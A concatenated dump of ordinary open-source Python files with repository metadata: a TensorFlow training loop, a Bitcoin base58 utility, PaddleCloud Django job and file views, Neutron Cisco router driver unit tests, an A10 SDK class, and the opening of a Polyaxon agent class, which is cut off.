FLAGS.learning_rate, decay_steps)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
model2, vals = train(
model2,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
only_head=True,
only_linear_head=True,
finetune=True,
prefix='gauss_finetune_{}_'.format(model_seq),
add_gauss_noise=True)
if run == 0:
vals_avg_4.append(vals)
else:
vals_avg_4[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run /
(run + 1.0)) * vals_avg_4[model_seq-adjust]
if run == 0:
vals_std_4.append(vals**2)
else:
vals_std_4[model_seq-adjust] = (1.0 /
(run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std_4[model_seq-adjust]
for i in range(FLAGS.num_seq_models-adjust):
vals_std[i] = np.sqrt(vals_std[i] - vals_avg[i]**2)
if len(vals_std_2) > 0:
vals_std_2[i] = np.sqrt(vals_std_2[i] - vals_avg_2[i]**2)
if FLAGS.monitor_robustness_measures:
vals_std_3[i] = np.sqrt(vals_std_3[i] - vals_avg_3[i]**2)
vals_std_4[i] = np.sqrt(vals_std_4[i] - vals_avg_4[i]**2)
else:
ValueError('Unknown Stage {}'.format(stage))
if __name__ == '__main__':
app.run(main)
| {
"content_hash": "048a6c1a5746fc584efb13982fa042a6",
"timestamp": "",
"source": "github",
"line_count": 1090,
"max_line_length": 158,
"avg_line_length": 43.154128440366975,
"alnum_prop": 0.5802330031038735,
"repo_name": "google-research/simplicity-bias",
"id": "ad1d9f51c0b7c499fbeb2acddffd114dc6dc77c2",
"size": "47730",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "task_seq.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "312703"
}
],
"symlink_target": ""
} |
from sklearn2sql_heroku.tests.classification import generic as class_gen
class_gen.test_model("RandomForestClassifier" , "BreastCancer" , "hive")
| {
"content_hash": "74078eb2bfe443946c010244f01c3a4d",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 72,
"avg_line_length": 37,
"alnum_prop": 0.7972972972972973,
"repo_name": "antoinecarme/sklearn2sql_heroku",
"id": "b5d653ef13f7faf680df182de06fcca2f1e2f4fc",
"size": "148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/classification/BreastCancer/ws_BreastCancer_RandomForestClassifier_hive_code_gen.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "507043"
},
{
"name": "Procfile",
"bytes": "37"
},
{
"name": "Python",
"bytes": "1021137"
},
{
"name": "R",
"bytes": "2521"
}
],
"symlink_target": ""
} |
'''
Bitcoin base58 encoding and decoding.
Based on https://bitcointalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
new = hashlib.sha256
if str != bytes:
# Python 3.x
def ord(c):
return c
def chr(n):
return bytes((n,))
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
if isinstance(c, str):
c = ord(c)
long_value += (256**i) * c
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == 0:
nPad += 1
else:
break
return (__b58chars[0] * nPad) + result
def b58decode(v, length=None):
""" decode v into a string of len bytes
"""
long_value = 0
for i, c in enumerate(v[::-1]):
pos = __b58chars.find(c)
assert pos != -1
long_value += pos * (__b58base**i)
result = bytes()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
continue
break
result = bytes(nPad) + result
if length is not None and len(result) != length:
return None
return result
def checksum(v):
"""Return 32-bit checksum based on SHA256"""
return SHA256.new(SHA256.new(v).digest()).digest()[0:4]
def b58encode_chk(v):
"""b58encode a string, with 32-bit checksum"""
return b58encode(v + checksum(v))
def b58decode_chk(v):
"""decode a base58 string, check and remove checksum"""
result = b58decode(v)
if result is None:
return None
if result[-4:] == checksum(result[:-4]):
return result[:-4]
else:
return None
def get_bcaddress_version(strAddress):
""" Returns None if strAddress is invalid. Otherwise returns integer version of address. """
addr = b58decode_chk(strAddress)
if addr is None or len(addr) != 21:
return None
version = addr[0]
return ord(version)
if __name__ == '__main__':
# Test case (from http://gitorious.org/bitcoin/python-base58.git)
assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') == 0
_ohai = 'o hai'.encode('ascii')
_tmp = b58encode(_ohai)
assert _tmp == 'DYB3oMS'
assert b58decode(_tmp, 5) == _ohai
print("Tests passed")
| {
"content_hash": "526c7c34815e81344075e8ac3d2714e5",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 97,
"avg_line_length": 23.934959349593495,
"alnum_prop": 0.5883152173913043,
"repo_name": "Bitcoin-ABC/bitcoin-abc",
"id": "88d6da81d09946c24cf86db2382e25a679917576",
"size": "3158",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "contrib/testgen/base58.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28178"
},
{
"name": "C",
"bytes": "1160721"
},
{
"name": "C++",
"bytes": "9817660"
},
{
"name": "CMake",
"bytes": "195193"
},
{
"name": "CSS",
"bytes": "4284"
},
{
"name": "Dockerfile",
"bytes": "3559"
},
{
"name": "HTML",
"bytes": "25754"
},
{
"name": "Java",
"bytes": "41238"
},
{
"name": "JavaScript",
"bytes": "2366459"
},
{
"name": "Kotlin",
"bytes": "3712"
},
{
"name": "M4",
"bytes": "31132"
},
{
"name": "Makefile",
"bytes": "100617"
},
{
"name": "Objective-C++",
"bytes": "5811"
},
{
"name": "PHP",
"bytes": "94504"
},
{
"name": "Perl",
"bytes": "4551"
},
{
"name": "PowerShell",
"bytes": "2277"
},
{
"name": "Python",
"bytes": "2706993"
},
{
"name": "QMake",
"bytes": "798"
},
{
"name": "Ruby",
"bytes": "21108"
},
{
"name": "Rust",
"bytes": "54953"
},
{
"name": "Sage",
"bytes": "39795"
},
{
"name": "Shell",
"bytes": "167526"
},
{
"name": "TypeScript",
"bytes": "66320"
}
],
"symlink_target": ""
} |
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse, HttpResponseNotFound, HttpResponseForbidden
from django.contrib import messages
from django.conf import settings
from django.utils.encoding import smart_str
from django.contrib.auth.decorators import login_required
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from . import PaddleJob
from rest_framework.authtoken.models import Token
from rest_framework import viewsets, generics, permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.parsers import MultiPartParser, FormParser, FileUploadParser
import json
import utils
import notebook.utils
import logging
import os
import copy
from notebook.models import FilePublish
import uuid
from cloudprovider.k8s_provider import K8sProvider
from paddle_job import PaddleJob
def file_publish_view(request):
"""
view for download published files
"""
username = request.user.username
publish_uuid = request.GET.get("uuid")
if not publish_uuid:
return HttpResponseNotFound()
record = FilePublish.objects.get(uuid=publish_uuid)
if not record:
return HttpResponseNotFound()
# FIXME(typhoonzero): not support folder currently
if record.path.endswith("/"):
return HttpResponseNotFound()
real_path = "/".join([settings.STORAGE_PATH] + record.path.split("/")[4:])
logging.info("downloading file from: %s, record(%s)", real_path,
record.path)
# mimetype is replaced by content_type for django 1.7
response = HttpResponse(
open(real_path), content_type='application/force-download')
response[
'Content-Disposition'] = 'attachment; filename=%s' % os.path.basename(
record.path)
# It's usually a good idea to set the 'Content-Length' header too.
# You can also set any other required headers: Cache-Control, etc.
return response
class FilePublishAPIView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
"""
return a list of published files for current user
"""
record = FilePublish.objects.filter(user=request.user)
file_list = [rec.path for rec in record]
url_list = [rec.url for rec in record]
return Response({"files": file_list, "urls": url_list})
def post(self, request, format=None):
"""
given a pfs path generate a uniq sharing url for the path
"""
post_body = json.loads(request.body)
file_path = post_body.get("path")
publish_uuid = uuid.uuid4()
publish_url = "http://%s/filepub/?uuid=%s" % (
request.META["HTTP_HOST"], publish_uuid)
# save publish_url to mysql
publish_record = FilePublish()
publish_record.url = publish_url
publish_record.user = request.user
publish_record.path = file_path
publish_record.uuid = publish_uuid
publish_record.save()
return Response({"url": publish_url})
def get_paddlejob(request):
username = request.user.username
obj = json.loads(request.body)
topology = obj.get("topology", "")
entry = obj.get("entry", "")
if not topology and not entry:
return utils.simple_response(500, "no topology or entry specified")
if not obj.get("datacenter"):
return utils.simple_response(500, "no datacenter specified")
cfgs = {}
dc = obj.get("datacenter")
# jobPackage validation: startwith /pfs
# NOTE: job packages are uploaded to /pfs/[dc]/home/[user]/jobs/[jobname]
job_name = obj.get("name", "paddle-cluster-job")
package_in_pod = os.path.join("/pfs/%s/home/%s" % (dc, username), "jobs",
job_name)
logging.info("current package: %s", package_in_pod)
# package must be ready before submit a job
package_path_4test = package_in_pod.replace("/pfs/%s/home" % dc,
settings.STORAGE_PATH)
if not os.path.exists(package_path_4test):
package_path_4test = package_in_pod.replace("/pfs/%s/home/%s" % (
dc, username), settings.STORAGE_PATH)
if not os.path.exists(package_path_4test):
return utils.error_message_response(
"package not exist in cloud: %s" % package_path_4test)
logging.info("current package in pod: %s", package_path_4test)
envs = {}
envs.update({"PADDLE_CLOUD_CURRENT_DATACENTER": dc})
envs.update({"PADDLE_CLOUD_USERNAME": username})
# ===================== create PaddleJob instance ======================
paddle_job = PaddleJob(
name=job_name,
job_package=package_in_pod,
parallelism=obj.get("parallelism", 1),
cpu=obj.get("cpu", 1),
memory=obj.get("memory", "1Gi"),
pservers=obj.get("pservers", 1),
pscpu=obj.get("pscpu", 1),
psmemory=obj.get("psmemory", "1Gi"),
topology=topology,
entry=entry,
gpu=obj.get("gpu", 0),
image=obj.get("image", None),
passes=obj.get("passes", 1),
registry_secret=obj.get("registry", None),
volumes=[],
envs=envs,
fault_tolerant=obj.get("faulttolerant", False),
min_instance=obj.get("min_instance", 1),
max_instance=obj.get("max_instance", 1),
etcd_image=settings.ETCD_IMAGE,
dc=dc)
logging.info("return paddlejob")
return paddle_job
class TrainingJobsView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
username = request.user.username
p = K8sProvider()
ret_dict = p.get_trainingjobs(username)
return Response(ret_dict)
def post(self, request, format=None):
"""
Submit a trainingjobs.
"""
username = request.user.username
job = get_paddlejob(request)
p = K8sProvider()
try:
p.submit_trainingjobs(job, username)
except Exception, e:
return utils.error_message_response(str(e))
return utils.simple_response(200, "")
def delete(self, request, format=None):
"""
Kill a trainingjobs.
"""
username = request.user.username
obj = json.loads(request.body)
jobname = obj.get("jobname")
p = K8sProvider()
retcode, status = p.delete_trainingjobs(jobname, username)
return utils.simple_response(retcode, "\n".join(status))
class JobsView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
username = request.user.username
p = K8sProvider()
ret_dict = p.get_jobs(username)
return Response(ret_dict)
def post(self, request, format=None):
"""
Submit the PaddlePaddle job
"""
# ========== submit master ReplicaSet if using fault_tolerant feature ==
username = request.user.username
job = get_paddlejob(request)
p = K8sProvider()
try:
p.submit_job(job, username)
except Exception, e:
return utils.error_message_response(str(e))
return utils.simple_response(200, "")
def delete(self, request, format=None):
"""
Kill a job
"""
username = request.user.username
obj = json.loads(request.body)
jobname = obj.get("jobname")
p = K8sProvider()
retcode, status = p.delete_job(jobname, username)
return utils.simple_response(retcode, "\n".join(status))
class PserversView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
"""
List all pservers
"""
username = request.user.username
p = K8sProvider()
return Response(p.get_pservers(username))
class LogsView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
username = request.user.username
jobname = request.query_params.get("jobname")
num_lines = request.query_params.get("n")
worker = request.query_params.get("w")
total_job_log = K8sProvider().get_logs(jobname, num_lines, worker,
username)
return utils.simple_response(200, total_job_log)
class WorkersView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
username = request.user.username
jobname = request.query_params.get("jobname")
ret = K8sProvider().get_workers(jobname, username)
return Response(ret)
class QuotaView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
username = request.user.username
ret = K8sProvider().get_quotas(username)
return Response(ret)
class GetUserView(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request, format=None):
"""
Get user name
"""
content = {
'user':
request.user.username, # `django.contrib.auth.User` instance.
}
return Response(content)
class SimpleFileView(APIView):
permission_classes = (permissions.IsAuthenticated, )
parser_classes = (
FormParser,
MultiPartParser, )
def __validate_path(self, request, file_path):
"""
returns error_msg. error_msg will be empty if there's no error.
"""
path_parts = file_path.split(os.path.sep)
assert (path_parts[1] == "pfs")
assert (path_parts[2] in settings.DATACENTERS.keys())
assert (path_parts[3] == "home")
assert (path_parts[4] == request.user.username)
server_file = os.path.join(settings.STORAGE_PATH,
request.user.username, *path_parts[5:])
return server_file
def get(self, request, format=None):
"""
Simple get file.
"""
file_path = request.query_params.get("path")
try:
write_file = self.__validate_path(request, file_path)
except Exception, e:
return utils.error_message_response("file path not valid: %s" %
str(e))
if not os.path.exists(os.sep + write_file):
return Response({"msg": "file not exist"})
response = HttpResponse(
open(write_file), content_type='application/force-download')
response[
'Content-Disposition'] = 'attachment; filename="%s"' % os.path.basename(
write_file)
return response
def post(self, request, format=None):
"""
Simple put file.
"""
file_obj = request.data['file']
file_path = request.query_params.get("path")
if not file_path:
return utils.error_message_response("must specify path")
try:
write_file = self.__validate_path(request, file_path)
except Exception, e:
return utils.error_message_response("file path not valid: %s" %
str(e))
if not os.path.exists(os.path.dirname(write_file)):
try:
os.makedirs(os.path.dirname(write_file))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
# FIXME: always overwrite package files
with open(write_file, "w") as fn:
while True:
data = file_obj.read(4096)
if not data:
break
fn.write(data)
return Response({"msg": ""})
class SimpleFileList(APIView):
permission_classes = (permissions.IsAuthenticated, )
parser_classes = (
FormParser,
MultiPartParser, )
def get(self, request, format=None):
"""
Simple list files.
"""
file_path = request.query_params.get("path")
dc = request.query_params.get("dc")
# validate list path must be under user's dir
path_parts = file_path.split(os.path.sep)
msg = ""
if len(path_parts) < 5:
msg = "path must like /pfs/[dc]/home/[user]"
else:
if path_parts[1] != "pfs":
msg = "path must start with /pfs"
if path_parts[2] not in settings.DATACENTERS.keys():
msg = "no datacenter " + path_parts[2]
if path_parts[3] != "home":
msg = "path must like /pfs/[dc]/home/[user]"
if path_parts[4] != request.user.username:
msg = "not a valid user: " + path_parts[4]
if msg:
return Response({"msg": msg})
real_path = file_path.replace("/pfs/%s/home/%s" % (
dc, request.user.username), "/pfs/%s" % request.user.username)
if not os.path.exists(real_path):
return Response({"msg": "dir not exist"})
return Response({"msg": "", "items": os.listdir(real_path)})
| {
"content_hash": "2694b7bc5582195c88bcf2479f704204",
"timestamp": "",
"source": "github",
"line_count": 387,
"max_line_length": 117,
"avg_line_length": 34.348837209302324,
"alnum_prop": 0.5988114044986083,
"repo_name": "gongweibao/cloud",
"id": "7018618396acc5ab9300d22f2b0fe10aec30722e",
"size": "13906",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "python/paddlecloud/paddlejob/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1103"
},
{
"name": "Go",
"bytes": "79494"
},
{
"name": "HTML",
"bytes": "8917"
},
{
"name": "JavaScript",
"bytes": "270250"
},
{
"name": "Python",
"bytes": "150171"
},
{
"name": "Shell",
"bytes": "13820"
}
],
"symlink_target": ""
} |
import sys
import mock
import netaddr
from neutron.common import constants as l3_constants
from neutron.openstack.common import uuidutils
from neutron.tests import base
from neutron.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
cisco_csr1kv_snippets as snippets)
sys.modules['ncclient'] = mock.MagicMock()
sys.modules['ciscoconfparse'] = mock.MagicMock()
from neutron.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
csr1kv_routing_driver as csr_driver)
from neutron.plugins.cisco.cfg_agent.service_helpers import routing_svc_helper
_uuid = uuidutils.generate_uuid
FAKE_ID = _uuid()
PORT_ID = _uuid()
class TestCSR1kvRouting(base.BaseTestCase):
def setUp(self):
super(TestCSR1kvRouting, self).setUp()
device_params = {'management_ip_address': 'fake_ip',
'protocol_port': 22,
'credentials': {"username": "stack",
"password": "cisco"},
}
self.driver = csr_driver.CSR1kvRoutingDriver(
**device_params)
self.mock_conn = mock.MagicMock()
self.driver._csr_conn = self.mock_conn
self.driver._check_response = mock.MagicMock(return_value=True)
self.vrf = ('nrouter-' + FAKE_ID)[:csr_driver.CSR1kvRoutingDriver.
DEV_NAME_LEN]
self.driver._get_vrfs = mock.Mock(return_value=[self.vrf])
self.ex_gw_ip = '20.0.0.30'
self.ex_gw_cidr = '20.0.0.30/24'
self.ex_gw_vlan = 1000
self.ex_gw_gateway_ip = '20.0.0.1'
self.ex_gw_port = {'id': _uuid(),
'network_id': _uuid(),
'fixed_ips': [{'ip_address': self.ex_gw_ip,
'subnet_id': _uuid()}],
'subnet': {'cidr': self.ex_gw_cidr,
'gateway_ip': self.ex_gw_gateway_ip},
'ip_cidr': self.ex_gw_cidr,
'mac_address': 'ca:fe:de:ad:be:ef',
'hosting_info': {'segmentation_id': self.ex_gw_vlan,
'hosting_port_name': 't2_p:0'}}
self.vlan_no = 500
self.gw_ip_cidr = '10.0.0.1/16'
self.gw_ip = '10.0.0.1'
self.hosting_port = 't1_p:0'
self.port = {'id': PORT_ID,
'ip_cidr': self.gw_ip_cidr,
'fixed_ips': [{'ip_address': self.gw_ip}],
'hosting_info': {'segmentation_id': self.vlan_no,
'hosting_port_name': self.hosting_port}}
int_ports = [self.port]
self.router = {
'id': FAKE_ID,
l3_constants.INTERFACE_KEY: int_ports,
'enable_snat': True,
'routes': [],
'gw_port': self.ex_gw_port}
self.ri = routing_svc_helper.RouterInfo(FAKE_ID, self.router)
self.ri.internal_ports = int_ports
def test_csr_get_vrf_name(self):
self.assertEqual(self.driver._csr_get_vrf_name(self.ri), self.vrf)
def test_create_vrf(self):
confstr = snippets.CREATE_VRF % self.vrf
self.driver._create_vrf(self.vrf)
self.assertTrue(self.driver._csr_conn.edit_config.called)
self.driver._csr_conn.edit_config.assert_called_with(target='running',
config=confstr)
def test_remove_vrf(self):
confstr = snippets.REMOVE_VRF % self.vrf
self.driver._remove_vrf(self.vrf)
self.assertTrue(self.driver._csr_conn.edit_config.called)
self.driver._csr_conn.edit_config.assert_called_with(target='running',
config=confstr)
def test_router_added(self):
confstr = snippets.CREATE_VRF % self.vrf
self.driver.router_added(self.ri)
self.assertTrue(self.driver._csr_conn.edit_config.called)
self.driver._csr_conn.edit_config.assert_called_with(target='running',
config=confstr)
def test_router_removed(self):
confstr = snippets.REMOVE_VRF % self.vrf
self.driver._remove_vrf(self.vrf)
self.assertTrue(self.driver._csr_conn.edit_config.called)
self.driver._csr_conn.edit_config.assert_called_once_with(
target='running', config=confstr)
def test_internal_network_added(self):
self.driver._create_subinterface = mock.MagicMock()
interface = 'GigabitEthernet0' + '.' + str(self.vlan_no)
self.driver.internal_network_added(self.ri, self.port)
args = (interface, self.vlan_no, self.vrf, self.gw_ip,
netaddr.IPAddress('255.255.0.0'))
self.driver._create_subinterface.assert_called_once_with(*args)
def test_internal_network_removed(self):
self.driver._remove_subinterface = mock.MagicMock()
interface = 'GigabitEthernet0' + '.' + str(self.vlan_no)
self.driver.internal_network_removed(self.ri, self.port)
self.driver._remove_subinterface.assert_called_once_with(interface)
def test_routes_updated(self):
dest_net = '20.0.0.0/16'
next_hop = '10.0.0.255'
route = {'destination': dest_net,
'nexthop': next_hop}
dest = netaddr.IPAddress('20.0.0.0')
destmask = netaddr.IPNetwork(dest_net).netmask
self.driver._add_static_route = mock.MagicMock()
self.driver._remove_static_route = mock.MagicMock()
self.driver.routes_updated(self.ri, 'replace', route)
self.driver._add_static_route.assert_called_once_with(
dest, destmask, next_hop, self.vrf)
self.driver.routes_updated(self.ri, 'delete', route)
self.driver._remove_static_route.assert_called_once_with(
dest, destmask, next_hop, self.vrf)
def test_floatingip(self):
floating_ip = '15.1.2.3'
fixed_ip = '10.0.0.3'
self.driver._add_floating_ip = mock.MagicMock()
self.driver._remove_floating_ip = mock.MagicMock()
self.driver._add_interface_nat = mock.MagicMock()
self.driver._remove_dyn_nat_translations = mock.MagicMock()
self.driver._remove_interface_nat = mock.MagicMock()
self.driver.floating_ip_added(self.ri, self.ex_gw_port,
floating_ip, fixed_ip)
self.driver._add_floating_ip.assert_called_once_with(
floating_ip, fixed_ip, self.vrf)
self.driver.floating_ip_removed(self.ri, self.ex_gw_port,
floating_ip, fixed_ip)
self.driver._remove_interface_nat.assert_called_once_with(
'GigabitEthernet1.1000', 'outside')
self.driver._remove_dyn_nat_translations.assert_called_once_with()
self.driver._remove_floating_ip.assert_called_once_with(
floating_ip, fixed_ip, self.vrf)
self.driver._add_interface_nat.assert_called_once_with(
'GigabitEthernet1.1000', 'outside')
def test_external_gateway_added(self):
self.driver._create_subinterface = mock.MagicMock()
self.driver._add_default_static_route = mock.MagicMock()
ext_interface = 'GigabitEthernet1' + '.' + str(1000)
args = (ext_interface, self.ex_gw_vlan, self.vrf, self.ex_gw_ip,
netaddr.IPAddress('255.255.255.0'))
self.driver.external_gateway_added(self.ri, self.ex_gw_port)
self.driver._create_subinterface.assert_called_once_with(*args)
self.driver._add_default_static_route.assert_called_once_with(
self.ex_gw_gateway_ip, self.vrf)
def test_enable_internal_network_NAT(self):
self.driver._nat_rules_for_internet_access = mock.MagicMock()
int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
ext_interface = 'GigabitEthernet1' + '.' + str(1000)
args = (('acl_' + str(self.vlan_no)),
netaddr.IPNetwork(self.gw_ip_cidr).network,
netaddr.IPNetwork(self.gw_ip_cidr).hostmask,
int_interface,
ext_interface,
self.vrf)
self.driver.enable_internal_network_NAT(self.ri, self.port,
self.ex_gw_port)
self.driver._nat_rules_for_internet_access.assert_called_once_with(
*args)
def test_enable_internal_network_NAT_with_confstring(self):
self.driver._csr_conn.reset_mock()
self.driver._check_acl = mock.Mock(return_value=False)
int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
ext_interface = 'GigabitEthernet1' + '.' + str(1000)
acl_no = ('acl_' + str(self.vlan_no))
int_network = netaddr.IPNetwork(self.gw_ip_cidr).network
int_net_mask = netaddr.IPNetwork(self.gw_ip_cidr).hostmask
self.driver.enable_internal_network_NAT(self.ri, self.port,
self.ex_gw_port)
self.assert_edit_running_config(
snippets.CREATE_ACL, (acl_no, int_network, int_net_mask))
self.assert_edit_running_config(
snippets.SET_DYN_SRC_TRL_INTFC, (acl_no, ext_interface, self.vrf))
self.assert_edit_running_config(
snippets.SET_NAT, (int_interface, 'inside'))
self.assert_edit_running_config(
snippets.SET_NAT, (ext_interface, 'outside'))
def test_disable_internal_network_NAT(self):
self.driver._remove_interface_nat = mock.MagicMock()
self.driver._remove_dyn_nat_translations = mock.MagicMock()
self.driver._remove_dyn_nat_rule = mock.MagicMock()
int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
ext_interface = 'GigabitEthernet1' + '.' + str(1000)
self.driver.disable_internal_network_NAT(self.ri, self.port,
self.ex_gw_port)
args = (('acl_' + str(self.vlan_no)), ext_interface, self.vrf)
self.driver._remove_interface_nat.assert_called_once_with(
int_interface, 'inside')
self.driver._remove_dyn_nat_translations.assert_called_once_with()
self.driver._remove_dyn_nat_rule.assert_called_once_with(*args)
def assert_edit_running_config(self, snippet_name, args):
if args:
confstr = snippet_name % args
else:
confstr = snippet_name
self.driver._csr_conn.edit_config.assert_any_call(
target='running', config=confstr)
def test_disable_internal_network_NAT_with_confstring(self):
self.driver._cfg_exists = mock.Mock(return_value=True)
int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
ext_interface = 'GigabitEthernet1' + '.' + str(1000)
acl_no = 'acl_' + str(self.vlan_no)
self.driver.disable_internal_network_NAT(self.ri, self.port,
self.ex_gw_port)
self.assert_edit_running_config(
snippets.REMOVE_NAT, (int_interface, 'inside'))
self.assert_edit_running_config(snippets.CLEAR_DYN_NAT_TRANS, None)
self.assert_edit_running_config(
snippets.REMOVE_DYN_SRC_TRL_INTFC, (acl_no, ext_interface,
self.vrf))
self.assert_edit_running_config(snippets.REMOVE_ACL, acl_no)
| {
"content_hash": "f9808c23ff6a0fdbd6ec27def0c5c059",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 79,
"avg_line_length": 42.90298507462686,
"alnum_prop": 0.5799269438163159,
"repo_name": "virtualopensystems/neutron",
"id": "c93b2d45b01aab8862c8560eeae95809934ffcd1",
"size": "12184",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/cisco/cfg_agent/test_csr1kv_routing_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21914"
},
{
"name": "JavaScript",
"bytes": "60527"
},
{
"name": "Python",
"bytes": "9873662"
},
{
"name": "Shell",
"bytes": "9202"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
from a10sdk.common.A10BaseClass import A10BaseClass
class Store(A10BaseClass):
""" :param create: {"default": 0, "optional": true, "type": "number", "description": "Create an import store profile", "format": "flag"}
:param name: {"description": "profile name to store remote url", "format": "string", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param remote_file: {"optional": true, "type": "string", "format": "url"}
:param delete: {"default": 0, "optional": true, "type": "number", "description": "Delete an import store profile", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
Create store name for remote url.
Class store supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/import/store`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "store"
self.a10_url="/axapi/v3/import/store"
self.DeviceProxy = ""
self.create = ""
self.name = ""
self.remote_file = ""
self.delete = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| {
"content_hash": "dc52ffff2da6698182cbe7264bed92d7",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 157,
"avg_line_length": 34.41463414634146,
"alnum_prop": 0.6158752657689582,
"repo_name": "a10networks/a10sdk-python",
"id": "e13b0aed3d0fb25728e212db61785565574ed9ac",
"size": "1411",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10sdk/core/A10_import/import_store.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6956372"
}
],
"symlink_target": ""
} |
import time
import traceback
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Tuple
from kubernetes.client.rest import ApiException
import polyaxon_sdk
from polyaxon import live_state, settings
from polyaxon.agents import converter
from polyaxon.agents.spawners.spawner import Spawner
from polyaxon.client import PolyaxonClient
from polyaxon.env_vars.getters import get_run_info
from polyaxon.exceptions import PolypodException
from polyaxon.lifecycle import V1StatusCondition, V1Statuses
from polyaxon.logger import logger
from polyaxon.schemas.cli.checks_config import ChecksConfig
from polyaxon.utils.tz_utils import now
from polyaxon.utils.workers_utils import exit_context, get_pool_workers, get_wait
class BaseAgent:
HEALTH_FILE = "/tmp/.healthz"
SLEEP_STOP_TIME = 60 * 5
SLEEP_ARCHIVED_TIME = 60 * 60
def __init__(self, sleep_interval=None):
self.sleep_interval = sleep_interval
self.spawner = Spawner()
self._spawner_refreshed_at = now()
self.client = PolyaxonClient()
self._graceful_shutdown = False
self.content = settings.AGENT_CONFIG.to_dict(dump=True)
def get_info(self) -> polyaxon_sdk.V1Agent:
raise NotImplementedError
def get_state(self) -> polyaxon_sdk.V1AgentStateResponse:
raise NotImplementedError
def sync_compatible_updates(self, compatible_updates: Dict):
raise NotImplementedError
@classmethod
def get_healthz_config(cls):
try:
return ChecksConfig.read(cls.HEALTH_FILE, config_type=".json")
except Exception: # noqa
return
@classmethod
def ping(cls):
ChecksConfig.init_file(cls.HEALTH_FILE)
config = cls.get_healthz_config()
if config:
config.last_check = now()
config.write(cls.HEALTH_FILE, mode=config.WRITE_MODE)
@classmethod
def pong(cls, interval: int = 15) -> bool:
config = cls.get_healthz_config()
if not config:
return False
return not config.should_check(interval=interval)
def refresh_spawner(self):
if (
now() - self._spawner_refreshed_at
).total_seconds() > settings.AGENT_CONFIG.get_spawner_refresh_interval():
logger.debug("Refreshing spawner ... ")
self.spawner.refresh()
self._spawner_refreshed_at = now()
def start(self) -> None:
try:
with exit_context() as exit_event:
index = 0
workers = get_pool_workers()
with ThreadPoolExecutor(workers) as pool:
logger.debug("Thread pool Workers: {}".format(workers))
timeout = self.sleep_interval or get_wait(index)
while not exit_event.wait(timeout=timeout):
index += 1
self.refresh_spawner()
agent_state = self.process(pool)
self._check_status(agent_state)
if agent_state.state.full:
index = 2
self.ping()
